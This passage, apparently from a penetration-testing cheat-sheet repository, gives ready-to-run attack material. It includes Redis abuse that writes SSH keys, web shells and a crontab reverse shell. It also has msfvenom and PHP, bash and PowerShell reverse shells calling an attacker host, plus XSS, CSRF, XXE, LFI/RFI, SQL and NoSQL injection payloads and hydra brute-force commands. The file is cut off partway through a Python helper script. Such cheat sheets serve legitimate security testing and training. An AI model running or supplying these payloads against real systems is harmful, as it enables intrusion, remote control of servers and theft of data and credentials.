SET DIR /home//.ssh 45 | CONFIG SET DBFILENAME authorized_keys 46 | SAVE 47 | ``` 48 | - PHP RCE: 49 | ```bash 50 | redis-cli -h -p 6379 -a 51 | 52 | SET somekey "\n\n \n\n" 53 | CONFIG SET rdbcompression no 54 | CONFIG SET DIR /var/www/html/ 55 | CONFIG SET DBFILENAME shell.php 56 | SAVE 57 | ``` 58 | - Crontab python RCE: 59 | ```bash 60 | redis-cli -h -p 6379 -a 61 | 62 | SET somekey "\n\n* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n" 63 | CONFIG SET rdbcompression no 64 | CONFIG SET DIR /var/spool/cron/crontabs/ 65 | CONFIG SET DBFILENAME root 66 | SAVE 67 | ``` 68 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-80-443-http/README.md: -------------------------------------------------------------------------------- 1 | # Web enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Subdomain discovery](#subdomain-discovery) 4 | * [Verify working domains from a list](#verify-working-domains-from-a-list) 5 | * [Brute forcing](#brute-forcing) 6 | * [Path discovery](#path-discovery) 7 | * [Open Redirect](#open-redirect) 8 | * [Cross-site scripting _(XSS)_](#cross-site-scripting-xss) 9 | * [Prototype pollution](#prototype-pollution) 10 | * [Types](#types) 11 | * [PoC Examples](#poc-examples) 12 | * [Cross-site request forgery _(CSRF)_](#cross-site-request-forgery-csrf) 13 | * [Prerequisites](#prerequisites) 14 | * [Payload](#payload) 15 | * [Clickjacking](#clickjacking) 16 | * [Prerequisites](#prerequisites) 17 | * [Payload](#payload) 18 | * [Message Listeners](#message-listeners) 19 | * [File upload](#file-upload) 20 | * [XML external entity _(XXE)_](#xml-external-entity-xxe) 21 | * [Server-side request forgery _(SSRF)_](#server-side-request-forgery-ssrf) 22 | * [File inclusion](#file-inclusion) 23 | * [Local file inclusion _(LFI)_](#local-file-inclusion-lfi) 24 | * [Remote file inclusion _(RFI)_](#remote-file-inclusion-rfi) 25 | * [Command injection](#command-injection) 26 | * [SQL injection](#sql-injection) 27 | * [SQLI fuzzing](#sqli-fuzzing) 28 | * [SQLI autoenumeration](#sqli-autoenumeration) 29 | * [SQLI authentication bypass](#sqli-authentication-bypass) 30 | * [SQLI select payloads](#sqli-select-payloads) 31 | * [SQLI union-based](#sqli-union-based) 32 | * [SQLI error-based](#sqli-error-based) 33 | * [SQLI conditional payloads](#sqli-conditional-payloads) 34 | * [SQLI conditional ordering and grouping](#sqli-conditional-ordering-and-grouping) 35 | * [SQLI conditional error](#sqli-conditional-error) 36 | * [SQLI conditional sleep](#sqli-conditional-sleep) 37 | * [SQLI conditional batch query sleep](#sqli-conditional-batch-query-sleep) 38 | * [NoSQL injection](#nosql-injection) 39 | * [NoSQLI Fuzzing](#nosqli-fuzzing) 40 | * [NoSQLI authentication bypass](#nosqli-authentication-bypass) 41 | * [NoSQLI username/password brute-forcing](#nosqli-usernamepassword-brute-forcing) 42 | * [Server side template injection _(SSTI)_](#server-side-template-injection-ssti) 43 | * [Error-based information disclosure](#error-based-information-disclosure) 44 | * [Brute-forcing credentials](#brute-forcing-credentials) 45 | 46 | ## Initial enumeration 47 | ```bash 48 | nmap -vv -p 80,443 -sT --script=+http* # Other ports may also have an HTTP server running 49 | ``` 50 | 51 | 52 | ## Subdomain discovery 53 | ### Verify working domains from a list 54 | - `domains.txt` list after sublist3r or other Subdomain Finder: 55 | ```bash 56 | wget https://raw.githubusercontent.com/maksyche/pentest-everything/refs/heads/master/enum_and_exploit/tcp-80-443-http/domain_verifier.py \ 57 | && python3 ./domain_verifier.py 58 | ``` 59 | 60 | ### Brute forcing 61 | - CTFs _(don't forget to update word count)_: 62 | ```bash 63 | wfuzz -t 100 -w ~/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ." --hw 1 --hc 400 -u 64 | ``` 65 | - Slow one for real targets: 66 | ```bash 67 | wfuzz -t 1 -s 0.3 --req-delay 1 --conn-delay 1 -w ~/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ." --hw 1 --hc 400 -u 68 | ``` 69 | 70 | 71 | ## Path discovery 72 | - Slow scan for real targets _(it speeds up when links are extracted)_: 73 | ```bash 74 | feroxbuster --threads 1 --scan-limit 1 --rate-limit 1 -d 4 -u -w ~/SecLists/Discovery/Web-Content/common.txt -x html --extract-links 75 | ``` 76 | - Scan common paths with extensions: 77 | ```bash 78 | feroxbuster -t 50 -L 2 -d 4 -u -w ~/SecLists/Discovery/Web-Content/common.txt -x html,md,txt --extract-links 79 | ``` 80 | - Scan more paths with common web extensions: 81 | ```bash 82 | feroxbuster -t 100 -L 1 -d 1 -u -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,htm,asp,aspx,jsp,cgi 83 | ``` 84 | - Scan more paths with common file extensions: 85 | ```bash 86 | feroxbuster -t 100 -L 1 -d 1 -u -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x bak,php.bak,php.swp,txt,log,xml,pdf,doc,docs,sh,pl,py,exe,jpeg,jpg,png,zip,tar.gz 87 | ``` 88 | 89 | 90 | ## Open Redirect 91 | - Look for all things that say "redirect"; 92 | - Often works in auth flows (might lead to token or PII stealing in some cases); 93 | - Try simple payloads: 94 | - `redirectURL=https://evil-website.com\victim-website.com` 95 | - `redirectURL=https://evil-website.com/https://victim-website.com` 96 | - `redirectURL=victim-website.com@https://evil-website.com` 97 | - `redirectURL=https://evil-website.com?https://victim-website.com` 98 | - Try upgrading to XSS `javascript:alert(1)` 99 | 100 | 101 | ## Cross-site scripting _(XSS)_ 102 | - Simple PoC of encoding absence (search for `test123` in inspect to see what got encoded and where the payload ended up): 103 | ```html 104 | test123'test123"test123
test 105 | ``` 106 | - Payload examples (nice ones here: https://github.com/Edr4/XSS-Bypass-Filters): 107 | - Inside an html tag: [tag event examples](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet), `">`, `'>`; 108 | - Between tags: ``; 109 | - Between `` tags: `';js_code;//`, `";js_code;//`, ``, ``, etc; 110 | - In href: `javascript:alert(1);` or `javascript://example.com/test%0aalert(1)` 111 | - In backticks: `${alert(1)}` 112 | - Iframe src: `data:text/html;valid_website.com;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==` 113 | - Angular (`ng-app`): `{{1+2+'test123'}}` 114 | - 2 parameters with unencoded `\` character on one line in a script: `firstparameter\"` ... `js_code //` 115 | - If you try new line characters (`%0A` or `%0D`) you'll break the quotes, but you won't be able to close them. 116 | - When JS code inside `_blind_xss\"> 136 | ``` 137 | 138 | 139 | ## Prototype pollution 140 | Affects both frontend and backend. May lead to code execution _(XSS and RCE)_ with correct gadgets. Backend attack 141 | attempts might fully kill the instance. 142 | ### Types 143 | - Simple `__proto__` injection: 144 | ```js 145 | const payload = '__proto__'; 146 | const obj = {"test":"123"}; 147 | const arr = ["firts", "second", "third"]; 148 | obj.__proto__.polluted = 'pwned' 149 | obj[payload]['polluted'] = 'pwned'; 150 | Object.prototype.polluted = 'pwned' 151 | console.log({}.polluted); // Output: "pwned" for all 3 pollution options 152 | console.log([].polluted); // Output: "pwned" for all 3 pollution options 153 | console.log(arr['polluted']); // Output: "pwned" for all 3 pollution options, even for arrays 154 | ``` 155 | - `__proto__` injection in Arrays: 156 | ```js 157 | const payload = '__proto__'; 158 | const arr = ["firts", "second", "third"]; 159 | arr[payload]['polluted'] = 'pwned'; 160 | console.log([]['polluted']); // Output: "pwned" 161 | console.log([].polluted); // Output: "pwned" 162 | console.log({}.polluted); // Output: "undefined", cause only Array.prototype is affected 163 | ``` 164 | - `constructor.prototype` injection: 165 | ```js 166 | const payload = '__proto__'; 167 | const obj = {"test":"123"}; 168 | obj['constructor']['prototype']['polluted'] = 'pwned' 169 | console.log({}.polluted); // Output: "pwned" 170 | ``` 171 | - improperly implemented `merge()` or `clone()` functions (especially after `JSON.parse()`): 172 | ```js 173 | const someLib = await import('somelib'); 174 | var maliciousJson = JSON.parse('{"__proto__":{"polluted":true}}'); 175 | var victim = {} 176 | console.log(JSON.stringify(victim.__proto__)); // {} 177 | someLib.merge({}, maliciousJson) 178 | console.log(JSON.stringify(victim.__proto__)); // {"polluted":true} 179 | ``` 180 | ### PoC Examples 181 | - URL parameters: 182 | ``` 183 | ?__proto__[evilProperty]=payload 184 | ?constructor[prototype][evilProperty]=payload 185 | ?__proto__.evilProperty=payload 186 | ?constructor.prototype.evilProperty=payload 187 | #__proto__[evilProperty]=payload 188 | ``` 189 | - JSON body: 190 | ```json 191 | { 192 | "__proto__": { 193 | "polluted": true 194 | } 195 | } 196 | ``` 197 | - Web Messages: 198 | ```js 199 | window.postMessage('{"__proto__":{"polluted":true}}', "*") 200 | ``` 201 | 202 | 203 | ## Cross-site request forgery _(CSRF)_ 204 | ### Prerequisites 205 | - Cookie-based auth; 206 | - If the important cookie has `SameSite=None`: 207 | - No CSRF token exists (check headers, body, cookies); 208 | - Token, but not tied to a session or not unique (try using a token from another session); 209 | - Token, but tied to some random cookie (vulnerable with [cookie injection](#cookie-injection)); 210 | - Token exists, but the check is skipped if token is absent; 211 | - Double Submit (same tokens or just tied to each other). 212 | - If `SameSite=Lax` (or not set): 213 | - Check if something can be done with GET requests (use html form with `method="get"`); 214 | - Check if the cookie can be refreshed (for example, but triggering OAuth flow). If the cookie is fresh (<120s) and 215 | the `SameSite` is not set, `POST` requests can be executed; 216 | - Subdomains are same site; 217 | - Also, some servers check `Referer` header; 218 | ### Payload 219 | ```html 220 |
221 | 222 |
223 | 226 | ``` 227 | 228 | 229 | ## Clickjacking 230 | ### Prerequisites 231 | - `X-Frame-Options` missing, or `ALLOW-FROM` a controlled origin, or `ALLOWALL` (non-standard). It doesn't work with 232 | ``; 233 | - `CSP` headers not configured properly; 234 | - Find a button that can be clicked; 235 | - See if there are any frame busting (like prevent clicking on transparent frames). Can be bypassed with 236 | [sandbox](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#sandbox); 237 | - See which cookies are available in the iframe: 238 | - Parent page cannot access iframe's cookies and visa-versa if they are from different origins (SOP policy); 239 | - Only `SameSite=None` cookies will be available inside the embedded iframe; 240 | ### Payload 241 | ```html 242 | 243 | 244 | 273 | 274 | 275 |
276 |

Click here!

277 |
278 | 279 |
280 |
281 | 283 | 284 | 285 | ``` 286 | 287 | 288 | ## Message Listeners 289 | - `Cross-Origin-Opener-Policy` is missing or misconfigured; 290 | - Check for potentially vulnerable message listeners: 291 | - `.addEventListener("message"` 292 | - `.addEventListener(` 293 | - `.onmessage` 294 | - Debug the listener in a console: `window.postMessage("test", "*")`; 295 | - Search for possible [Prototype pollution](#prototype-pollution), especially when parsing json. 296 | - Iframes of the target window are not accessible (SOP); 297 | - Open a pop-up window and send a payload in `postMessage` on a malicious web page (it opens with all cookies): 298 | ```html 299 | 300 | 301 | 302 | 303 | 304 | Malicious Page 305 | 306 | 307 |

Click anywhere

308 | 341 | 342 | 343 | ``` 344 | 345 | 346 | ## File upload 347 | - Filename path issues: 348 | - Add `../../` to the filename to try storing it into a random location; 349 | - Even if the file is renamed, it might be temporarily stored with the name provided in the request; 350 | - Bypass filters: 351 | - Check if it's a whitelist, or a blacklist filter by passing something like: `jpg_but_bullshit.etrhbdfeqt`. 352 | - Use an inner extension: `file.jpg.php` 353 | - Add magic numbers: https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5 354 | 355 | - Msfvenom common web reverse shells (do not work well a without metasploit listener): 356 | ```bash 357 | msfvenom -p php/reverse_php LHOST= LPORT=443 -f raw > shell.php 358 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f asp > shell.asp 359 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f aspx > shell.aspx 360 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp 361 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war 362 | ``` 363 | - Simple PHP reverse shell: 364 | ```php 365 | 366 | ``` 367 | ``` 368 | /?c=bash+-c+"bash+-i+>%26+/dev/tcp//443+0>%261" 369 | ``` 370 | ``` 371 | /?c=powershell+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('',443)%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" 372 | ``` 373 | - Or simplified (or try others from https://www.revshells.com/ if nothing works): 374 | ```php 375 | & /dev/tcp//443 0>&1"'); ?> 376 | ``` 377 | 378 | 379 | ## XML external entity _(XXE)_ 380 | - PoC: 381 | ```xml 382 | 383 | ]> 384 | 385 | &xxe; 386 | 387 | ``` 388 | - Blind PoC: 389 | ```bash 390 | sudo nc -lvnp 443 391 | ``` 392 | ```xml 393 | 394 | :443"> ]> 395 | 396 | &xxe; 397 | 398 | ``` 399 | - A simple payload to perform LFI attack: 400 | ```xml 401 | 402 | ]> 403 | 404 | &xxe; 405 | 406 | ``` 407 | - A simple payload to perform LFI attack using php filters: 408 | ```xml 409 | 410 | ]> 411 | 412 | &xxe; 413 | 414 | ``` 415 | - A simple payload to perform SSRF attack: 416 | ```xml 417 | 418 | ]> 419 | 420 | &xxe; 421 | 422 | ``` 423 | - Payloads: 424 | - https://github.com/payloadbox/xxe-injection-payload-list 425 | - https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity 426 | 427 | 428 | ## Server-side request forgery _(SSRF)_ 429 | - A simple payload: 430 | ``` 431 | http://127.0.0.1:/ 432 | ``` 433 | - An advanced payload _(using ipv6 or decimal value to bypass filters)_: 434 | ``` 435 | http://[::]:/ 436 | http://:::/ 437 | http://2130706433:/ 438 | ``` 439 | - Read a local file: 440 | ``` 441 | file:// 442 | ``` 443 | - Try different URI schemes (especially project-dependant like `jar:`): 444 | - https://en.wikipedia.org/wiki/List_of_URI_schemes 445 | - https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml 446 | 447 | 448 | ## File inclusion 449 | ### Local file inclusion _(LFI)_ 450 | - Fuzzing URL params: 451 | ```bash 452 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/Traversal.txt --basic : -X -u ?=FUZZ 453 | ``` 454 | - Basic PoC (easy to execute with `curl -s --path-as-is http://:/`): 455 | ```bash 456 | ../../../../../../../../../etc/passwd 457 | ../../../../../../../../../etc/passwd%00 458 | ....//....//....//....//....//....//....//....//....//etc/passwd 459 | ....//....//....//....//....//....//....//....//....//etc/passwd%00 460 | ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 461 | ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%00 462 | ``` 463 | - Reading a PHP file instead of executing it: 464 | ```php 465 | include("php://filter/convert.base64-encode/resource="); 466 | ``` 467 | 468 | 469 | ### Remote file inclusion _(RFI)_ 470 | - Basic PoC: 471 | ```bash 472 | sudo python3 -m http.server 80 473 | http:///test 474 | http:///test%00 475 | http:%252f%252f%252ftest 476 | http:%252f%252f%252ftest%00 477 | ``` 478 | - Bypassing URL prohibition: 479 | ```bash 480 | data:text/plain,testing 481 | data:text/plain, 482 | ``` 483 | 484 | 485 | ## Command injection 486 | - PoC _(both Windows and Linux)_: 487 | ```bash 488 | whoami 489 | ``` 490 | - Blind PoC: 491 | ```bash 492 | sudo tcpdump ip proto \\icmp -i tun0 493 | 494 | ping -c 1 495 | ping -n 1 # Windows 496 | ``` 497 | - Test blind command injection by redirecting output to a file that can be opened in the webserver: 498 | ```bash 499 | whoami > /var/www/static/ 500 | whoami > /var/www/images/ 501 | ``` 502 | 503 | 504 | ## SQL injection 505 | ### SQLI fuzzing 506 | ```bash 507 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/SQL.txt -d 'username=FUZZ&password=anypassword' -u 508 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/SQL.txt,urlencode --basic : -X -u '?=FUZZ' 509 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/SQL.txt --basic : -X -H '
: FUZZ' 510 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/SQL.txt,urlencode --basic : -X -b '=FUZZ' 511 | ``` 512 | 513 | ### SQLI autoenumeration 514 | - Copy raw HTTP request into a `request.txt` file and retrieve basic DB info 515 | ```bash 516 | sqlmap -r request.txt -p --risk=3 --level=5 --users --passwords --privileges --dbs 517 | ``` 518 | - Fetch tables of the database: 519 | ```bash 520 | sqlmap -r request.txt -p --risk=3 --level=5 -D --tables 521 | ``` 522 | - Dump a table: 523 | ```bash 524 | sqlmap -r request.txt -p --risk=3 --level=5 -D -T --dump 525 | ``` 526 | 527 | ### SQLI authentication bypass 528 | ```bash 529 | wget https://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/master/Intruder/exploit/Auth_Bypass.txt 530 | wfuzz -c -z file,./Auth_Bypass.txt -d 'username=FUZZ&password=anypassword' -u 531 | ``` 532 | 533 | ### SQLI select payloads 534 | - Guess database type to enumerate: 535 | - [MySQL enumeration](../tcp-3306-mysql/README.md#enumerating-a-database) 536 | - [PostgreSQL enumeration](../tcp-5432-pgsql/README.md#enumerating-a-database) 537 | - [MSSQL enumeration](../tcp-1433-mssql/README.md#enumerating-a-database) 538 | - [Oracle DB enumeration](../tcp-1521-oracle_db/README.md#enumerating-a-database) 539 | 540 | - Concatenate result columns into a single one: 541 | ```SQL 542 | SELECT concat(,char(58),) FROM -- MySQL 543 | SELECT ||chr(58)|| FROM -- PostgreSQL 544 | SELECT +char(58)+ FROM -- MSSQL 545 | SELECT ||chr(58)|| FROM -- Oracle 546 | ``` 547 | - Usecases _(select payloads can be used with different SQL injection types or by themselves in these cases)_: 548 | ```SQL 549 | UPDATE table SET column = ''||() -- MySQL(if PIPES_AS_CONCAT=true)/PostgreSQL/Oracle 550 | UPDATE table SET column = ''+() -- MSSQL 551 | 552 | INSERT INTO table (column) VALUES (''||()) -- MySQL(if PIPES_AS_CONCAT=true)/PostgreSQL/Oracle 553 | INSERT INTO table (column) VALUES (''+()) -- MSSQL 554 | ``` 555 | 556 | ### SQLI union-based 557 | - Get column number: 558 | ```SQL 559 | ORDER BY 560 | 561 | UNION SELECT NULL,NULL -- MySQL/PostgreSQL/MSSQL 562 | UNION SELECT NULL,NULL FROM DUAL -- Oracle 563 | ``` 564 | - Find which column can return a string: 565 | ```SQL 566 | UNION SELECT NULL,char(97) -- MySQL/MSSQL 567 | UNION SELECT NULL,chr(97) -- PostgreSQL 568 | UNION SELECT NULL,chr(97) FROM DUAL -- Oracle 569 | ``` 570 | - Get some data: 571 | ```SQL 572 | UNION SELECT NULL,() -- MySQL/MSSQL/PostgreSQL 573 | UNION SELECT NULL,() FROM DUAL -- Oracle (if select payload doesn't have FROM statement) 574 | ``` 575 | - Usecases: 576 | ```SQL 577 | SELECT column FROM table WHERE another_column = 'wrong_value' -- SELECT WHERE 578 | SELECT column FROM table GROUP BY column -- SELECT GROUP BY. You may have to skip original query response in the result set. 579 | SELECT column FROM table GROUP BY column HAVING column = 'wrong_value' -- SELECT HAVING 580 | SELECT column FROM table WHERE any_column = 'wrong_value' -- SELECT TABLE NAME 581 | ``` 582 | 583 | ### SQLI error-based 584 | - Proof of concept: 585 | ```SQL 586 | extractvalue(0x00,concat(0x3f,(concat(char(112),char(114),char(111),char(111),char(102))))) -- MySQL 587 | cast(chr(112)||chr(114)||chr(111)||chr(111)||chr(102) AS INTEGER) -- PostgreSQL/Oracle 588 | cast(char(112)+char(114)+char(111)+char(111)+char(102) AS INTEGER) -- MSSQL 589 | ``` 590 | - Get some data: 591 | ```SQL 592 | extractvalue(0x00,concat(0x3f,())) -- MySQL. Output is limited to 31 characters so better use substring(column_name,1,30) in select payloads. 593 | cast(() AS INTEGER) -- PostgreSQL/Oracle/MSSQL 594 | ``` 595 | - Usecases: 596 | ```SQL 597 | SELECT column FROM table WHERE another_column = 'any_value' AND -- SELECT WHERE 598 | SELECT column FROM table ORDER BY -- SELECT ORDER BY 599 | SELECT column FROM table GROUP BY -- SELECT GROUP BY 600 | SELECT column FROM table GROUP BY column HAVING column = 'any_value' AND -- SELECT HAVING 601 | SELECT column FROM table WHERE -- SELECT TABLE NAME 602 | 603 | UPDATE table SET column = ''||() -- UPDATE. MySQL(used as 'OR' if PIPES_AS_CONCAT=false)/PostgreSQL/Oracle 604 | UPDATE table SET column = ''+() -- UPDATE. MSSQL 605 | UPDATE table SET column = 'FALSE' AND -- UPDATE 606 | UPDATE table SET column = 'value' WHERE another_column = 'any_value' AND -- UPDATE WHERE 607 | 608 | INSERT INTO table (column) VALUES (''||()) -- INSERT. MySQL(used as 'OR' if PIPES_AS_CONCAT=false)/PostgreSQL/Oracle 609 | INSERT INTO table (column) VALUES (''+()) -- INSERT. MSSQL 610 | INSERT INTO table (column) VALUES ('FALSE' AND ) -- INSERT 611 | ``` 612 | 613 | ### SQLI conditional payloads 614 | - Proof of concept: 615 | ```SQL 616 | 1=0 617 | '1'='0' -- Don't comment the rest of the query, just don't close the last quote to keep everything from an original query. 618 | ``` 619 | - Get data length: 620 | ```SQL 621 | length(())>1 -- MySQL/PostgreSQL/Oracle 622 | len((1 -- MSSQL 623 | ``` 624 | - Get data characters one by one: 625 | ```SQL 626 | substring((),1,1) = 'a' -- MySQL/PostgreSQL/MSSQL 627 | substr((),1,1) = 'a' -- Oracle 628 | ``` 629 | - Compare to this data set _(or `char(32...126)` to bypass filters)_ using **Burp Intruder Brute Forcer**: 630 | ``` 631 | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ 632 | ``` 633 | - Usecases _(conditional payloads can be used in different conditional SQL injection types or by themselves in these cases)_: 634 | ```SQL 635 | SELECT column FROM table WHERE another_column = 'correct_value' AND -- SELECT WHERE 636 | SELECT column FROM table WHERE -- SELECT TABLE NAME 637 | SELECT column FROM table GROUP BY column HAVING column = 'any_value' AND -- SELECT HAVING 638 | UPDATE table SET column = 'value' WHERE another_column = 'any_value' AND -- UPDATE WHERE 639 | ``` 640 | 641 | ### SQLI conditional ordering and grouping 642 | - In `SELECT ORDER BY` and `SELECT GROUP BY` locations conditional payloads can be used to change ordering/grouping: 643 | ```SQL 644 | (if((), , )) -- MySQL 645 | (CASE WHEN() THEN ELSE END) -- PostgreSQL/MSSQL/Oracle 646 | ``` 647 | 648 | ### SQLI conditional error 649 | - Get some data: 650 | ```SQL 651 | (if((),(SELECT table_name FROM information_schema.tables),TRUE)) -- MySQL. Multiple return value error. 652 | (CASE WHEN() THEN cast(1/0 as VARCHAR) ELSE chr(97) END)=chr(97) -- PostgreSQL 653 | (CASE WHEN() THEN cast(1/0 as VARCHAR) ELSE char(97) END)=char(97) -- MSSQL 654 | (CASE WHEN() THEN to_char(1/0) ELSE chr(97) END)=chr(97) -- Oracle 655 | ``` 656 | - Usecases: 657 | ```SQL 658 | SELECT column FROM table WHERE another_column = 'correct_value' AND -- SELECT WHERE 659 | SELECT column FROM table WHERE -- SELECT TABLE NAME 660 | SELECT column FROM table GROUP BY column HAVING column = 'any_value' AND -- SELECT HAVING 661 | 662 | UPDATE table SET column = 'value' WHERE another_column = 'any_value' AND -- UPDATE WHERE 663 | ``` 664 | 665 | ### SQLI conditional sleep 666 | - Get some data _(returns true regardless of conditions, but sleeps on every row, so consider limiting the result set)_: 667 | ```SQL 668 | IF((), sleep(5), sleep(0))=sleep(0) -- MySQL 669 | (CASE WHEN() THEN chr(97)||pg_sleep(5) ELSE chr(97) END)=chr(97) -- PostgreSQL 670 | ``` 671 | - Locations: 672 | ```SQL 673 | SELECT column FROM table WHERE another_column = 'correct_value' AND -- SELECT WHERE 674 | SELECT column FROM table WHERE -- SELECT TABLE NAME 675 | SELECT column FROM table GROUP BY column HAVING column = 'any_value' AND -- SELECT HAVING 676 | 677 | UPDATE table SET column = 'value' WHERE another_column = 'any_value' AND -- UPDATE WHERE 678 | ``` 679 | 680 | ### SQLI conditional batch query sleep 681 | - Get some data _(can be used as batch queries only)_: 682 | ```SQL 683 | ; SELECT IF((),sleep(5),sleep(0)) -- MySQL. Only a couple of PHP and Python APIs support this. 684 | ; IF () WAITFOR DELAY '0:0:5' -- MSSQL. Time cannot be replaced with chars. 685 | ; SELECT CASE WHEN () THEN pg_sleep(5) ELSE pg_sleep(0) END -- PostgreSQL 686 | ``` 687 | 688 | 689 | ## NoSQL injection 690 | ### NoSQLI Fuzzing 691 | ```bash 692 | wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/NoSQL%20Injection/Intruder/NoSQL.txt 693 | wfuzz -c -w ./NoSQL.txt -d 'username=FUZZ&password=anypassword' -u 694 | ``` 695 | 696 | ### NoSQLI authentication bypass 697 | - Form data: 698 | ``` 699 | username[$ne]=wrongdata&password[$ne]=wrongdata 700 | username[$regex]=a.*&password[$ne]=wrongdata 701 | username[$gt]=admin&password[$ne]=wrongdata 702 | ``` 703 | - Json: 704 | ```json 705 | {"username": {"$ne": null}, "password": {"$ne": null}} 706 | {"username": {"$ne": "wrongdata"}, "password": {"$ne": "wrongdata"}} 707 | {"username": {"$gt": undefined}, "password": {"$gt": undefined}} 708 | {"username": {"$gt": ""}, "password": {"$gt": ""}} 709 | ``` 710 | 711 | ### NoSQLI username/password brute-forcing 712 | - Form data: 713 | ```bash 714 | echo 'a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 ! " # \$ % %26 '"'"' \( \) \* \+ , - \. / : ; < = > \? @ \[ \\\\ \] \^ _ ` \{ \| \} ~' > nosqli_regex.txt # Regex special characters are escaped 715 | sed 's/\s\+/\n/g' -i nosqli_regex.txt 716 | 717 | wfuzz -c -z file,./nosqli_regex.txt -d 'username[$regex]=^FUZZ.*&password[$ne]=wrongdata' -u 718 | wfuzz -c -z file,./nosqli_regex.txt -d 'username=&password[$regex]=^FUZZ.*' -u 719 | ``` 720 | - Json: 721 | ```bash 722 | echo 'a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9 ! " # \$ % & '"'"' \( \) \* \+ , - \. / : ; < = > \? @ \[ \\\\ \] \^ _ ` \{ \| \} ~' > nosqli_regex.txt # Regex special characters are escaped 723 | sed 's/\s\+/\n/g' -i nosqli_regex.txt 724 | 725 | wfuzz -c -z file,./nosqli_regex.txt -d '{"username": {"$regex": "^FUZZ.*"}, "password": {"$ne": null}}' -u 726 | wfuzz -c -z file,./nosqli_regex.txt -d '{"username": "", "password": {"$regex": "^FUZZ.*"}}' -u 727 | ``` 728 | 729 | 730 | ## Server side template injection _(SSTI)_ 731 | - Common PoC: 732 | ``` 733 | {{1+1}} 734 | ${1+1} 735 | ``` 736 | - Fuzzing: 737 | ```bash 738 | wget https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Template%20Injection/Intruder/ssti.fuzz 739 | wfuzz -c -w ./ssti.fuzz -d "=FUZZ" -u 740 | ``` 741 | - Payloads: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection 742 | 743 | 744 | ## Error-based information disclosure 745 | - Parameters/paths/headers/cookies fuzzing with some unusual data: 746 | ```bash 747 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/bad_chars.txt,urlencode --basic : -X -u ?=FUZZ 748 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/bad_chars.txt -d 'someparam=FUZZ' -u 749 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/bad_chars.txt --basic : -X -H "
: FUZZ" 750 | wfuzz -c -z file,/Users/kali/wfuzz_wordlist/Injections/bad_chars.txt,urlencode --basic : -X -b "=FUZZ" 751 | ``` 752 | 753 | 754 | ## Brute-forcing credentials 755 | - Brute-force post form username: 756 | ```bash 757 | hydra -V -t 64 -L /Users/kali/SecLists/Usernames/xato-net-10-million-usernames.txt -p test -s http-post-form "/:username=^USER^&password=^PASS^:" # Important: do not put '/' after the 758 | ``` 759 | - Brute-force post form password: 760 | ```bash 761 | hydra -V -t 64 -l -P /Users/kali/rockyou.txt -s http-post-form "/:username=^USER^&password=^PASS^:" 762 | ``` 763 | - Brute-force basic auth: 764 | ```bash 765 | hydra -V -t 64 -l -P /Users/kali/rockyou.txt -s http-get "/" 766 | ``` 767 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-80-443-http/domain_verifier.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from concurrent.futures import ThreadPoolExecutor 3 | from concurrent.futures import as_completed 4 | 5 | import requests 6 | 7 | 8 | def execute_request(domain_to_query): 9 | try: 10 | response = requests.get("https://" + domain_to_query, timeout=5) 11 | if 200 <= response.status_code < 400: 12 | print("Found working domain: https://" + domain_to_query) 13 | with 